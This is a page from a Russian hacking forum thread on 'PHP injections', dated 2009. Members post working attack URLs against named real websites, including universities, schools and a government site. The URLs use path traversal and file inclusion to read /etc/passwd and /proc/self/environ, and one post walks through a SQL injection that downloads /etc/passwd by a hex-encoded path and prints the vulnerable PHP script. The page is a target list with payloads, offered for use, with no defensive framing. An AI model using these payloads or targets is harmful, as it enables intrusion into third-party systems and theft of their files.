HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
Ответ
Страница 95 из 143 « Первая < 4585 91 92 93 94 95 96 97 98 99 105 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.08.2009, 15:06
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
http://www.eximoforta.ru/index.php?file=index.php цикл index.php
 
Ответить с цитированием

  #2  
Старый 28.08.2009, 19:59
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
http://www.ruspi.ru./?page=[local]
 
Ответить с цитированием

  #3  
Старый 28.08.2009, 23:58
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию
Код:
http://www.ie.rmutk.ac.th/index.php?file=../../../../../../../etc/passwd
Код:
http://www.cdu-rhauderfehn.de/index.php?folder=pages&file=../../../../../../../etc/passwd
 
Ответить с цитированием

  #4  
Старый 29.08.2009, 19:01
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию
Код:
http://yuanpei.pku.edu.cn/old/index.php?option=com_content&task=view&id=[RFI]
 
Ответить с цитированием

  #5  
Старый 30.08.2009, 19:20
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
http://www.tzimakos.gr/print.php?id=/proc/self/environ

http://my.getmorediamonds.com/getstarted.php?id=index.php&url=../../../../../../etc/passwd

http://www.joeplecker.com/display.php?id=/proc/self/environ

http://petercottontailpreschool.com/index.php?id=/etc/passwd
Последний раз редактировалось ph1l1ster; 30.08.2009 в 19:31..
 
Ответить с цитированием

  #6  
Старый 30.08.2009, 22:46
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию
http://pvp-game.ru/index.php?act=../index цикл index.php
 
Ответить с цитированием

  #7  
Старый 07.09.2009, 20:16
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
Думаю лучше к php иньекции отнести..хотя гугл говорит как sql иньекцию дак боян, но всё равно баг в другом скрипте!)

Интересная скуля, берёт имя файла из БД и даёт его на загрузку. (Я лично первый раз такое встречаю)

Код:
http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--
Идёт файл на загрузку, в имени файла вывод:

5.0.51a-3ubuntu5.4

подставим своё значение:
magic qutes = on, поэжтому захексим

Код:
http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--
И скачиваем /etc/passwd

presentations.php

PHP код:
    error_reporting(0);
    mysql_connect("localhost","*","*");
    mysql_select_db"owls08" );
    error_reporting(1);

    $id mysql_real_escape_string$_REQUEST['id'] );

    $query="SELECT file from presentations where id=$id";
    $result mysql_query$query ) or die( mysql_error() );
    $row mysql_fetch_array$result );

    $file $row['file'];
    
    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

    header("Content-Type: application/force-download");
    header"Content-Disposition: attachment; filename=".basename($file));
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: ".filesize($file));
    header"Content-Description: File Transfer");
    @readfile($file); 
 
Ответить с цитированием

  #8  
Старый 13.09.2009, 04:16
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
http://piecero.awardspace.us/index.php?page=../../../../../../../../../../../etc/passwd
http://www.mvhs.sad3.k12.me.us/sad3/mves/site.php?page=../../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #9  
Старый 13.09.2009, 10:42
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию
Код:
http://www.duma.gov.ru/index.jsp?t=./index.jsp
 
Ответить с цитированием

  #10  
Старый 13.09.2009, 13:46
DFrost
Познающий
Регистрация: 05.06.2009
Сообщений: 41
Провел на форуме:
258796

Репутация: 72
По умолчанию
Код:
http://www.summerschoolalpbach.at/index.php?file=index.php
Код:
http://www.b2match.com/watervienna09/index.php?file=index.php
Код:
http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd
Последний раз редактировалось DFrost; 13.09.2009 в 14:29..
 
Ответить с цитированием
Ответ
Страница 95 из 143 « Первая < 4585 91 92 93 94 95 96 97 98 99 105 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ